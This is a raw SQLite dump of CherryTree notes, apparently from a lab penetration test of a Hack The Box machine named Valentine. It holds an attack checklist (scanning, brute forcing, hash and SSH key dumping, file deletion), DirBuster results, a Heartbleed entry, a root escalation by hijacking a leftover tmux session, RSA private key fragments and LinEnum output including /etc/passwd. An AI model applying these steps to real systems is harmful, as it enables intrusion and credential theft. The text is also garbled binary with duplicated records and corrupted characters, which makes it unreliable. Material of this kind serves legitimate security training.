SQLite format 3@ h-  Y/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )btablecodeboxcodeboxCREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )mtablenodenodeCREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )';indexsqlite_autoindex_node_1node  h  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xAu/Pm'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"Aq Ĝk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CXk#'  Enumerationcustom-colors*Auk!' 10.10.10.Xcustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2&x)'  Dirb\DirBustercustom-colors$A?&xAu/Pm'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"Aq Ĝk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CXl#'  Enumerationcustom-colors*AuB#/'  Enumeration$ nmap -sC -sV -Pn -p- -oA ./Valentin_ ck '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2*)i'  Dirb\DirBuster$ dirbuster Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true Starting OWASP DirBuster 1.0-RC1 Starting dir/file list based brute forcing Dir found: / - 200 Dir found: /index/ - 200 Dir found: /cgi-bin/ - 403 File found: /index.php - 200 Dir found: /icons/ - 403 Dir found: /doc/ - 403 Dir found: /icons/small/ - 403 Dir found: /dev/ - 200 File found: /dev/hype_key - 200 File found: /dev/notes.txt - 200 custom-colors$A?&xA hrn )'  Other Servicescustom-colorsXA[Ad Us dsv)' 8)'  Script Results ########################q/'  Post Exploitationcustom-colors*AIZnn]%y'  ExploitationService l'   Othercustom-colorsA[EϯA[Tci '  DBcustom-colorsA[EA[Selk '  SNMPcustom-colorsA[DԢA[G!Bj '  SMBcustom-colorsA[PA[DN%K'  ExploitationService Exploited: OpenSSL Heartbleed Vulnerability Type: Memory b #/]'  Running ProcessesWriteable Files\Directories Directory List custom-colors$A[3QZ-U'  Host InformationOperating System Architecture Domain Installed Updates custom-colors$A[4* OO\O G'   NetworkIPConfig\IFConfig Network Processes ARP DNS Routecustom-colors$A[*܁p)'   Users & GroupsUsers Groupscustom-colors$A[k׀.9q'   Installed ApplicationsInstalled Applicationscustom-colors$AILg ^^Qg'  Goodiescustom-colorsVA?& c!+e'   Priv EscalationService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Exploit Code Used Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colorsAuoف)c'  Scheduled JobsScheduled Taskscustom-colors$ANl FF@7+'   Priv EscalationService Exploited: TMUX Vulnerability Type: Leftover TMUX session from a root user Exploit POC: man tmux Description: Resuming a named TMUX session Discovery of Vulnerability LnEnum output root 1005 0.0 0.1 26416 1676 ? Ss 14:11 0:01 /usr/bin/tmux -S /.devs/dev_sess Exploit Code Used tmux -S /.devs/dev_sess Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colorsA .Rich_text>Individual Host Scanning ☐ nmap --top-ports 20 --open -iL iplist.txt ☐ nmap -sS -A -sV -O -p- ipaddress ☐ nmap -sU ipaddress Service Scanning WebAppNiktodirb ☐ dirbuster ☐ wpscan ☐ dotdotpwn ☐ view source ☐ davtest\cadevar ☐ droopscan ☐ joomscan ☐ LFI\RFI Test Linux\Windows ☐ snmpwalk -c public -v1 ipaddress 1 ☐ smbclient -L //ipaddress ☐ showmount -e ipaddress port ☐ rpcinfo ☐ Enum4Linux Anything Elsenmap scripts (locate *nse* | grep servicename) ☐ hydra ☐ MSF Aux Modules ☐ Download the softward Exploitation ☐ Gather Version Numbes ☐ Searchsploit ☐ Default Creds ☐ Creds Previously Gathered ☐ Download the software Post Exploitation Linux ☐ linux-local-enum.sh ☐ linuxprivchecker.py ☐ linux-exploit-suggestor.sh ☐ unix-privesc-check.py Windows ☐ wpc.exe ☐ windows-exploit-suggestor.py ☐ windows_privesc_check.py ☐ windows-privesc-check2.exe Priv Escalationacesss internal services (portfwd) ☐ add account Windows ☐ List of exploits Linux ☐ sudo su ☐ KernelDB ☐ Searchsploit Final ☐ Screenshot of IPConfig\WhoamI ☐ Copy proof.txt ☐ Dump hashes ☐ Dump SSH Keys ☐ Delete filescustom-colorsANl<A[ڸ.,   t/'  Proof\Flags\Otherroot@Valentine:/home/hype/Desktop# whoami root root@Valentine:/home/hype/Desktop# hostname Valentine root@Valentine:/home/hype/Desktop# ifconfig eth0 Link encap:Ethernet HWaddr 00:50:56:b9:d0:09 inet addr:10.10.10.79 Bcast:10.10.10.255 Mask:255.255.255.0 inet6 addr: dead:beef::b881:fd57:25a3:d78f/64 Scope:Global inet6 addr: dead:beef::250:56ff:feb9:d009/64 Scope:Global inet6 addrZ /9'  Software VersionsSoftware Versions Potential Exploitscustom-colorsANlH{x;' 10.10.10.79 - Valentinecustom-colorsA4h  ' Log Bookcustom-colors(AI^NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ +wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe 2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP 09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3 -----END RSA PRIVATE KEY-----custom-colorsA Ey&A Q ^"1K'  #hype_key_converted-----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46 DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R 5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6 0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5 XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0################################# # Local Linux Enumeration & Privilege Escalation Script # ######################################################### # www.rebootuser.com # version 0.982 [-] Debug Info [+] Thorough tests = Enabled Scan started at: Thu Aug 27 15:12:21 PDT 2020  ### SYSTEM ############################################## [-] Kernel information: Linux Valentine 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux [-] Kernel information (continued): Linux version 3.2.0-23-generic (buildd@crested) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu4) ) #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 [-] Specific release information: DISTRIB_ID=Ubuntu DISTRIB_RELEASE=12.04 DISTRIB_CODENAME=precise DISTRIB_DESCRIPTION=&quot;Ubuntu 12.04 LTS" [-] Hostname: Valentine ### USER/GROUP ########################################## [-] Current user/group info: uid=1000(hype) gid=1000(hype) groups=1000(hype),24(cdrom),30(dip),46(plugdev),124(sambashare) [-] Users that have previously logged onto the system: Username Port From Latest root tty1 Fri Feb 16 14:38:30 -0800 2018 hype pts/0 10.10.14.7 Thu Aug 27 15:07:49 -0700 2020 [-] Who else is logged on: 15:12:21 up 1:01, 1 user, load average: 0.34, 0.17, 0.15 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT hype pts/0 10.10.14.7 15:07 2.00s 0.26s 0.00s /bin/bash ./Lin [-] Group memberships: uid=0(root) gid=0(root) groups=0(root) uid=1(daemon) gid=1(daemon) groups=1(daemon) uid=2(bin) gid=2(bin) groups=2(bin) uid=3(sys) gid=3(sys) groups=3(sys) uid=4(sync) gid=65534(nogroup) groups=65534(nogroup) uid=5(games) gid=60(games) groups=60(games) uid=6(man) gid=12(man) groups=12(man) uid=7(lp) gid=7(lp) groups=7(lp) uid=8(mail) gid=8(mail) groups=8(mail) uid=9(news) gid=9(news) groups=9(news) uid=10(uucp) gid=10(uucp) groups=10(uucp) uid=13(proxy) gid=13(proxy) groups=13(proxy) uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=34(backup) gid=34(backup) groups=34(backup) uid=38(list) gid=38(list) groups=38(list) uid=39(irc) gid=39(irc) groups=39(irc) uid=41(gnats) gid=41(gnats) groups=41(gnats) uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) uid=100(libuuid) gid=101(libuuid) groups=101(libuuid) uid=101(syslog) gid=103(syslog) groups=103(syslog) uid=102(messagebus) gid=105(messagebus) groups=105(messagebus) uid=103(colord) gid=108(colord) groups=108(colord) uid=104(lightdm) gid=111(lightdm) groups=111(lightdm) uid=105(whoopsie) gid=114(whoopsie) groups=114(whoopsie) uid=106(avahi-autoipd) gid=117(avahi-autoipd) groups=117(avahi-autoipd) uid=107(avahi) gid=118(avahi) groups=118(avahi) uid=108(usbmux) gid=46(plugdev) groups=46(plugdev) uid=109(kernoops) gid=65534(nogroup) groups=65534(nogroup) uid=110(pulse) gid=119(pulse) groups=119(pulse),29(audio) uid=111(rtkit) gid=122(rtkit) groups=122(rtkit) uid=112(speech-dispatcher) gid=29(audio) groups=29(audio) uid=113(hplip) gid=7(lp) groups=7(lp) uid=114(saned) gid=123(saned) groups=123(saned) uid=1000(hype) gid=1000(hype) groups=1000(hype),24(cdrom),30(dip),46(plugdev),124(sambashare) uid=115(sshd) gid=65534(nogroup) groups=65534(nogroup) [-] Contents of /etc/passwd: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:105::/var/run/dbus:/bin/false colord:x:103:108:colord colour management daemon,,,:/var/lib/colord:/bin/false lightdm:x:104:111:Light Display Manager:/var/lib/lightdm:/bin/false whoopsie:x:105:114::/nonexistent:/bin/false avahi-autoipd:x:106:117:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false avahi:x:107:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false usbmux:x:108:46:usbmux daemon,,,:/home/usbmux:/bin/false kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:110:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:111:122:RealtimeKit,,,:/proc:/bin/false speech-dispatcher:x:112:29:Speech Dispatcher, ,,:/var/run/speech-dispatcher:/bin/sh hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false saned:x:114:123::/home/saned:/bin/false hype:x:1000:1000:Hemorrhage,,,:/home/hype:/bin/bash sshd:x:115:65534::/var/run/sshd:/usr/sbin/nologin [-] Super user account(s): root [-] Are permissions on /home directories lax: total 12K drwxr-xr-x 3 root root 4.0K Dec 11 2017 . drwxr-xr-x 26 root root 4.0K Feb 6 2018 .. drwxr-xr-x 21 hype hype 4.0K Feb 5 2018 hype [-] Files owned by our user: -rw-rw-r-- 1 hype hype 153356 Dec 12 2017 /var/www/omg.jpg -rw-r--r-- 1 hype hype 675 Dec 11 2017 /home/hype/.profile -rw------- 1 hype hype 207 Dec 11 2017 /home/hype/.gnome2/keyrings/user.keystore -rw------- 1 hype hype 105 Dec 11 2017 /home/hype/.gnome2/keyrings/login.keyring -rw-rw-r-- 1 hype hype 104 Dec 11 2017 /home/hype/.fontconfig/cabbd14511b9e8a55e92af97fb3a0461-le64.cache-3 -rw-rw-r-- 1 hype hype 8832 Dec 11 2017 /home/hype/.fontconfig/e13b20fdb08344e0e664864c!c2ede53d-le64.cache-3 -rw-rw-r-- 1 hype hype 12872 Dec 11 2017 /home/hype/.fontconfig/7ef2298fde41cc6eeb7af42e48b7d293-le64.cache-3 -rw------- 1 hype hype 131 Feb 16 2018 /home/hype/.bash_history -rw-r--r-- 1 hype hype 220 Dec 11 2017 /home/hype/.bash_logout -rw-rw-r-- 1 hype hype 371 Dec 11 2017 /home/hype/.cache/unity-lens-video/videos.db -rw-rw-r-- 1 hype hype 3683 Dec 11 2017 /home/hype/.cache/update-manager-core/meta-release-lts -rw-rw-r-- 1 hype hype 541612 Dec 11 2017 /home/hype/.cache/wallpaper/0_5_1700_927_792beab7550410d531e55f95b449f135 -rw-r--r-- 1 hype hype 3072 Dec 11 2017 /home/hype/.cache/indicator-appmenu/hud-usage-log.sqlite -rw-rw-r-- 1 hype hype 1978 Dec 11 2017 /home/hype/.cache/unity/migration_script.log -rw------- 1 hype hype 1 Dec 11 2017 /home/hype/.cache/dconf/user -rw-r--r-- 1 hype hype 0 Dec 11 2017 /home/hype/.cache/motd.legal-displayed -rw-rw-r-- 1 hype hype 71 Dec 11 2017 /home/hype/.cache/indicators/messages/seen-db.keyfile -rw-r--r-- 1 hype hype 16384 Dec 11 20"17 /home/hype/.cache/event-sound-cache.tdb.c9052f1b76300a5447f46cc700000004.x86_64-pc-linux-gnu -rw-r--r-- 1 hype hype 26 Dec 11 2017 /home/hype/.dmrc -rw------- 1 hype hype 0 Dec 11 2017 /home/hype/.Xauthority -rw-rw-r-- 1 hype hype 5 Dec 11 2017 /home/hype/.config/user-dirs.locale -rw------- 1 hype hype 632 Dec 11 2017 /home/hype/.config/user-dirs.dirs -rw-rw-r-- 1 hype hype 1152 Dec 11 2017 /home/hype/.config/dconf/user -rw-rw-r-- 1 hype hype 97 Dec 11 2017 /home/hype/.config/nautilus/desktop-metadata -rw-rw-r-- 1 hype hype 3031 Dec 11 2017 /home/hype/.config/Trolltech.conf -rw------- 1 hype hype 1024 Dec 11 2017 /home/hype/.local/share/zeitgeist/activity.sqlite -rw------- 1 hype hype 281944 Dec 11 2017 /home/hype/.local/share/zeitgeist/activity.sqlite-wal -rw------- 1 hype hype 32768 Dec 11 2017 /home/hype/.local/share/zeitgeist/activity.sqlite-shm -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/position.baseA -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hy#pe/.local/share/zeitgeist/fts.index/termlist.baseB -rw-rw-r-- 1 hype hype 16384 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/record.DB -rw-rw-r-- 1 hype hype 28 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/iamchert -rw-rw-r-- 1 hype hype 16384 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/position.DB -rw-rw-r-- 1 hype hype 16384 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/termlist.DB -rw-rw-r-- 1 hype hype 0 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/flintlock -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/position.baseB -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/termlist.baseA -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/postlist.baseA -rw-rw-r-- 1 hype hype 16384 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/postlist.DB -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/record.baseB -rw-r$w-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/record.baseA -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/postlist.baseB -rw-r--r-- 1 hype hype 19456 Dec 11 2017 /home/hype/.local/share/webkit/icondatabase/WebpageIcons.db -rw-rw-r-- 1 hype hype 0 Dec 11 2017 /home/hype/.local/share/.converted-launchers -rw------- 1 hype hype 38 Dec 11 2017 /home/hype/.local/share/telepathy/mission-control/accounts-goa.cfg -rw-rw-r-- 1 hype hype 835 Dec 11 2017 /home/hype/.local/share/gsettings-data-convert -rw------- 1 hype hype 1766 Dec 13 2017 /home/hype/.ssh/id_rsa -rw------- 1 hype hype 222 Dec 13 2017 /home/hype/.ssh/known_hosts -rw-r--r-- 1 hype hype 397 Dec 13 2017 /home/hype/.ssh/id_rsa.pub -rw------- 1 hype hype 397 Dec 13 2017 /home/hype/.ssh/authorized_keys -rw------- 1 hype hype 115 Dec 11 2017 /home/hype/.gconf/apps/update-notifier/%gconf.xml -rw------- 1 hype hype 0 Dec 11 2017 /home/hype/.gconf/apps/%gconf.xml -rw------- 1 hype hy%pe 384 Dec 11 2017 /home/hype/.gconf/apps/update-manager/%gconf.xml -rw------- 1 hype hype 102 Dec 11 2017 /home/hype/.gconf/apps/nm-applet/%gconf.xml -rw------- 1 hype hype 0 Dec 11 2017 /home/hype/.gconf/apps/gnome-terminal/%gconf.xml -rw------- 1 hype hype 904 Dec 11 2017 /home/hype/.gconf/apps/gnome-terminal/profiles/Default/%gconf.xml -rw------- 1 hype hype 0 Dec 11 2017 /home/hype/.gconf/apps/gnome-terminal/profiles/%gconf.xml -rw------- 1 hype hype 21 Dec 11 2017 /home/hype/.mission-control/accounts/accounts.cfg -rw------- 1 hype hype 12173 Dec 11 2017 /home/hype/.xsession-errors -rw------- 1 hype hype 636 Dec 11 2017 /home/hype/.ICEauthority -rw-r--r-- 1 hype hype 696 Dec 11 2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-card-database.tdb -rw-r--r-- 1 hype hype 12288 Dec 11 2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-device-volumes.tdb -rw-r--r-- 1 hype hype 10 Dec 11 2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-default-sink -rw-r--r-- 1 hype hype 18 Dec &11 2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-default-source -rw-r--r-- 1 hype hype 696 Dec 11 2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-stream-volumes.tdb -rw-rw-r-- 1 hype hype 132 Dec 11 2017 /home/hype/.gtk-bookmarks -rw-rw-r-- 1 hype hype 5527 Aug 27 15:12 /home/hype/Desktop/output.txt -rwxrwxr-x 1 hype hype 46631 Jul 13 11:54 /home/hype/Desktop/LinEnum.sh -rw-rw-r-- 1 hype hype 33 Dec 13 2017 /home/hype/Desktop/user.txt -rw------- 1 hype hype 256 Dec 11 2017 /home/hype/.pulse-cookie -rw-rw-r-- 1 hype hype 463 Dec 11 2017 /home/hype/.dbus/session-bus/c9052f1b76300a5447f46cc700000004-0 -rw-r--r-- 1 hype hype 3486 Dec 11 2017 /home/hype/.bashrc -rw------- 1 hype hype 9659 Dec 11 2017 /home/hype/.xsession-errors.old [-] Hidden files: -rw-r--r-- 1 root root 2177 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/.conmakehash.cmd -rw-r--r-- 1 root root 3952 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/basic/.fixdep.cmd -rw-r--r-- '1 root root 104 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/mod/.elfconfig.h.cmd -rw-r--r-- 1 root root 4083 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/mod/.sumversion.o.cmd -rw-r--r-- 1 root root 2329 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/mod/.mk_elfconfig.cmd -rw-r--r-- 1 root root 1575 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/mod/.empty.o.cmd -rw-r--r-- 1 root root 3382 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/mod/.modpost.o.cmd -rw-r--r-- 1 root root 3068 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/mod/.file2alias.o.cmd -rw-r--r-- 1 root root 129 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/mod/.modpost.cmd -rw-r--r-- 1 root root 2657 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/selinux/mdp/.mdp.cmd -rw-r--r-- 1 root root 3057 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/selinux/genheaders/.genheaders.cmd -rw-r--r-- 1 root root 2317 Apr 10 (2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/genksyms/.parse.tab.o.cmd -rw-r--r-- 1 root root 2549 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/genksyms/.genksyms.o.cmd -rw-r--r-- 1 root root 3187 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/genksyms/.lex.lex.o.cmd -rw-r--r-- 1 root root 153 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/genksyms/.genksyms.cmd -rw-r--r-- 1 root root 2119 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/.kallsyms.cmd -rw-r--r-- 1 root root 110 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/kconfig/.conf.cmd -rw-r--r-- 1 root root 3101 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/kconfig/.conf.o.cmd -rw-r--r-- 1 root root 4501 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/kconfig/.zconf.tab.o.cmd -rw-r--r-- 1 root root 3018 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/scripts/.recordmcount.cmd -rw-r--r-- 1 root root 608 Apr 10 2012 /usr/src/linux-headers-3).2.0-23-generic/.missing-syscalls.d -rw-r--r-- 1 root root 140251 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/.config -rw-r--r-- 1 root root 39130 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/arch/x86/kernel/.asm-offsets.s.cmd -rw-r--r-- 1 root root 4854 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/kernel/.bounds.s.cmd -rw-r--r-- 1 root root 140290 Apr 10 2012 /usr/src/linux-headers-3.2.0-23-generic/.config.old -rw-r--r-- 1 root root 7 Jan 4 2012 /usr/src/linux-headers-3.2.0-23/scripts/basic/.gitignore -rw-r--r-- 1 root root 96 Jan 4 2012 /usr/src/linux-headers-3.2.0-23/scripts/.gitignore -rw-r--r-- 1 root root 34 Jan 4 2012 /usr/src/linux-headers-3.2.0-23/scripts/mod/.gitignore -rw-r--r-- 1 root root 21 Jan 4 2012 /usr/src/linux-headers-3.2.0-23/scripts/selinux/mdp/.gitignore -rw-r--r-- 1 root root 11 Jan 4 2012 /usr/src/linux-headers-3.2.0-23/scripts/selinux/genheaders/.gitignore -rw-r--r-- 1 root root 55 Jan 4 2012 /usr/src/linux-headers-3.2.0-23/scripts/dtc/.gitig*nore -rw-r--r-- 1 root root 42 Jan 4 2012 /usr/src/linux-headers-3.2.0-23/scripts/genksyms/.gitignore -rw-r--r-- 1 root root 178 Jan 4 2012 /usr/src/linux-headers-3.2.0-23/scripts/kconfig/.gitignore -rw-r--r-- 1 root root 31 Jan 4 2012 /usr/src/linux-headers-3.2.0-23/scripts/kconfig/lxdialog/.gitignore -rw-r--r-- 1 hype hype 675 Dec 11 2017 /home/hype/.profile -rw------- 1 hype hype 131 Feb 16 2018 /home/hype/.bash_history -rw-r--r-- 1 hype hype 220 Dec 11 2017 /home/hype/.bash_logout -rw-r--r-- 1 hype hype 26 Dec 11 2017 /home/hype/.dmrc -rw------- 1 hype hype 0 Dec 11 2017 /home/hype/.Xauthority -rw-rw-r-- 1 hype hype 0 Dec 11 2017 /home/hype/.local/share/.converted-launchers -rw-r--r-- 1 root root 39 Dec 13 2017 /home/hype/.tmux.conf -rw------- 1 hype hype 12173 Dec 11 2017 /home/hype/.xsession-errors -rw------- 1 hype hype 636 Dec 11 2017 /home/hype/.ICEauthority -rw-rw-r-- 1 hype hype 132 Dec 11 2017 /home/hype/.gtk-bookmarks -rw------- 1 hype hype 256 Dec 11 2017 /home/hype/.pulse-c+ookie -rw-r--r-- 1 hype hype 3486 Dec 11 2017 /home/hype/.bashrc -rw------- 1 hype hype 9659 Dec 11 2017 /home/hype/.xsession-errors.old -rw-r--r-- 1 root root 102 Apr 2 2012 /etc/cron.monthly/.placeholder -rw-r--r-- 1 root root 102 Apr 2 2012 /etc/cron.weekly/.placeholder -rw-r--r-- 1 root root 102 Apr 2 2012 /etc/cron.hourly/.placeholder -rw-r--r-- 1 root root 628 Dec 11 2017 /etc/apparmor.d/cache/.features -rw-r--r-- 1 root root 102 Apr 2 2012 /etc/cron.daily/.placeholder -rw-r--r-- 1 root root 675 Apr 3 2012 /etc/skel/.profile -rw-r--r-- 1 root root 220 Apr 3 2012 /etc/skel/.bash_logout -rw-r--r-- 1 root root 3486 Apr 3 2012 /etc/skel/.bashrc -rw-r--r-- 1 root root 0 Feb 21 2012 /etc/sensors.d/.placeholder -rw-r--r-- 1 root root 0 Apr 25 2012 /etc/init.d/.legacy-bootordering -rw------- 1 root root 0 Apr 25 2012 /etc/.pwd.lock -rw-r--r-- 1 root root 102 Apr 2 2012 /etc/cron.d/.placeholder [-] World-readable files within /home: -rw-r--r-- 1 hype hype 675 Dec 11 2017, /home/hype/.profile -rw-rw-r-- 1 hype hype 104 Dec 11 2017 /home/hype/.fontconfig/cabbd14511b9e8a55e92af97fb3a0461-le64.cache-3 -rw-rw-r-- 1 hype hype 8832 Dec 11 2017 /home/hype/.fontconfig/e13b20fdb08344e0e664864cc2ede53d-le64.cache-3 -rw-rw-r-- 1 hype hype 12872 Dec 11 2017 /home/hype/.fontconfig/7ef2298fde41cc6eeb7af42e48b7d293-le64.cache-3 -rw-r--r-- 1 hype hype 220 Dec 11 2017 /home/hype/.bash_logout -rw-rw-r-- 1 hype hype 371 Dec 11 2017 /home/hype/.cache/unity-lens-video/videos.db -rw-rw-r-- 1 hype hype 3683 Dec 11 2017 /home/hype/.cache/update-manager-core/meta-release-lts -rw-rw-r-- 1 hype hype 541612 Dec 11 2017 /home/hype/.cache/wallpaper/0_5_1700_927_792beab7550410d531e55f95b449f135 -rw-r--r-- 1 hype hype 3072 Dec 11 2017 